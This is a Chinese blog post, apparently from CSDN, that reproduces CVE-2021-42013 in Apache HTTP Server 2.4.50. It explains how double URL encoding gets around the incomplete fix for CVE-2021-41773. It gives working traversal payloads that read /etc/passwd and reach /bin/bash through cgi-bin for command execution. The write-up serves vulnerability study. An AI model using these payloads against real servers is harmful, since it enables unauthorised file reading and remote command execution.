CVE-2021-42013 漏洞复现

漏洞原理

Apache HTTP Server 2.4.50版本对CVE-2021-41773的修复可以避免一次url编码导致的路径穿越,但是由于在请求处理过程中,还会调用ap_unescape_url函数对参数再次进行解码,使得需进行两次解码,但即使这样仍然会导致路径穿越。

 文件读取payload

因为点.的url编码是%2e所以之后可以对2进行一次编码或者对e进行一次编码进行构造payload

#  下列payload是先对一个点.进行URL编码为%2e,之后对e单独编码得出%2%65

/icons/%2%65%2%65/%2%65%2%65/%2%65%2%65/%2%65%2%65/etc/passwd

命令执行payload

/cgi-bin/%2%65%2%65/%2%65%2%65/%2%65%2%65/%2%65%2%65/bin/bash

命令执行时操作方法与 CVE-2021-41773 相同

CVE-2021-41773 漏洞复现_爱吃仡坨的博客-CSDN博客

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值